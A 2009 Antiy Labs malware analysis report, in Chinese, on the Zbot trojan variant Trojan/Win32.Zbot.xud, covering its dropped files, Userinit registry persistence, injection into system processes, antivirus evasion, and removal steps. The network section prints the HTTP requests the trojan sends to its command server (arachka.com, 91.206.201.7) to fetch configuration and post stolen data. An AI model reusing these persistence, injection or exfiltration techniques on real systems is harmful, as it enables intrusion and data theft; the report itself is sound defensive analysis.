网络信息安全是一个博大精深的技术体系,安天将自己的注意力专注于主要矛盾,即计算机网络病毒问题。
    根据有关机构统计,全球超过80%的安全事件均与病毒有关,网络病毒是信息社会面临的主要安全挑战之一,因此,安天人将“天下无毒”作为自己追求的安全境界。
    安天将网络安全工作者的宏观视野与反病毒工程师的成熟细腻有机结合。将反病毒技术与网络监控技术、计算机犯罪取证技术、安全评估技术等进行了有机的结合,形成了自身的产品内涵。
  当前位置:首页 - 安全响应中心 -> 病毒分析报告

Trojan/Win32.Zbot.xud[Spy]分析
出处:安天实验室 时间:2009年7月7日
 

  • 病毒标签
 

病毒名称: Trojan/Win32.Zbot.xud[Spy]
病毒类型: 木马
文件 MD5: 9675C6D6C5EC9FDF88EB202A219870CE
公开范围: 完全公开
危害等级: 4
文件长度: 92,160 字节
感染系统: Windows98以上版本

  • 病毒描述
 

    该病毒为ecard病毒变种,病毒运行后创建互斥量名为"_AVIRA_21099"、"_AVIRA_2108"、"__SYSTEM__64AD0625__"、"D95DA28801C9FA1E000000EC2",动态获取大量API函数,获取当前用户的UI语言及计算机用户名,遍历进程查找"outpost.exe"、"zlclient.exe"(防火墙安全软件),判断自身进程路径是否为%System32%\目录下的sdra64.exe文件,如不是则拷贝自身到%System32%\目录下,命名为sdra64.exe将文件属性设置为隐藏、并在该文件尾部随机添加大量垃圾数据,干扰安全软件对其查杀,如是则修改注册表使用userinit.exe启动病毒,并监视注册表发现被删除之后立即添加,遍历进程找WINLOGON.EXE、SVCHOST.EXE、EXPLORER.EXE,找到之后打开进程获取模块句柄、获取进程绝对路径判断是进程否是病毒要查找的文件路径,如不是则关闭句柄,如是则申请内存空间从病毒体00400000为起始地址向以上进程中写入1024字节病毒数据,在System32%\目录下创建病毒文件夹lowsec在该目录内衍生2个病毒文件user.ds、local.ds将文件夹及文件设置为隐藏。

  • 行为分析-本地行为
 

1、文件运行后会释放以下文件
%System32%\sdra64.exe
%System32%\lowsec\user.ds 用于存储此特洛伊木马的加密配置
%System32%\lowsec\user.ds.lll
%System32%\lowsec\local.ds 用于保存收集的信息

2、修改注册表项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
新: 字符串: "C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,"
旧: 字符串: "C:\WINDOWS\system32\userinit.exe,"
描述:修改注册表使用userinit启动病毒

3、病毒运行后创建互斥量名为"_AVIRA_21099"、"_AVIRA_2108"、"__SYSTEM__64AD0625__"、"D95DA28801C9FA1E000000EC2",动态获取大量API函数,获取当前用户的UI语言及计算机用户名,遍历进程查找"outpost.exe"、"zlclient.exe"(防火墙安全软件)。

4、干扰安全软件对其查杀,如是则修改注册表使用userinit.exe启动病毒,并监视注册表发现被删除之后立即添加,遍历进程找WINLOGON.EXE、SVCHOST.EXE、EXPLORER.EXE,找到之后打开进程获取模块句柄、获取进程绝对路径判断是进程否是病毒要查找的文件路径,如不是则关闭句柄,如是则申请内存空间从病毒体00400000为起始地址向以上进程中写入1024字节病毒数据。

5、收集电子邮件可能会通过电子邮件发送垃圾邮件信息来传播自身:
pop3
%s://%s:%s@%u.%u.%u.%u:%u/
ftppop3
/
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)http/1.1
post
geturlmon.dll
http/1.1

  • 行为分析-网络行为
 

病毒运行后向91.206.201.7请求GET及发送post信息:
GET /djwlc/djwl.bin HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: arachka.com
Pragma: no-cache

POST /djwl/rec.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: arachka.com
Content-Length: 373
Connection: Keep-Alive
Pragma: no-cache
注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
        %Windir%             WINDODWS所在目录
        %DriveLetter%          逻辑驱动器根目录
        %ProgramFiles%          系统程序默认安装目录
        %HomeDrive%           当前启动的系统的所在分区
        %Documents and Settings%    当前用户文档根目录
        %Temp%             \Documents and Settings\当前用户\Local Settings\Temp
        %System32%            系统的 System32文件夹
    
        Windows2000/NT中默认的安装路径是C:\Winnt\System32
        windows95/98/me中默认的安装路径是%WINDOWS%\System
        windowsXP中默认的安装路径是%system32%

  • 清除方案
 

1、使用安天防线可彻底清除此病毒(推荐),请点击下载(http://www.antiyfx.com)
2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
推荐使用ATool管理工具,请点击下载(http://www.antiyfx.com/download/atool.zip)
(1)先打开Atool工具结束病毒相关进程

(2)使用Atool工具删除病毒衍生的文件
%System32%\sdra64.exe
%System32%\lowsec\user.ds
%System32%\lowsec\user.ds.lll
%System32%\lowsec\local.ds

(3)恢复病毒修改的注册表项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userinit
新: 字符串:
"C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe"
旧: 字符串: "C:\WINDOWS\system32\userinit.exe,"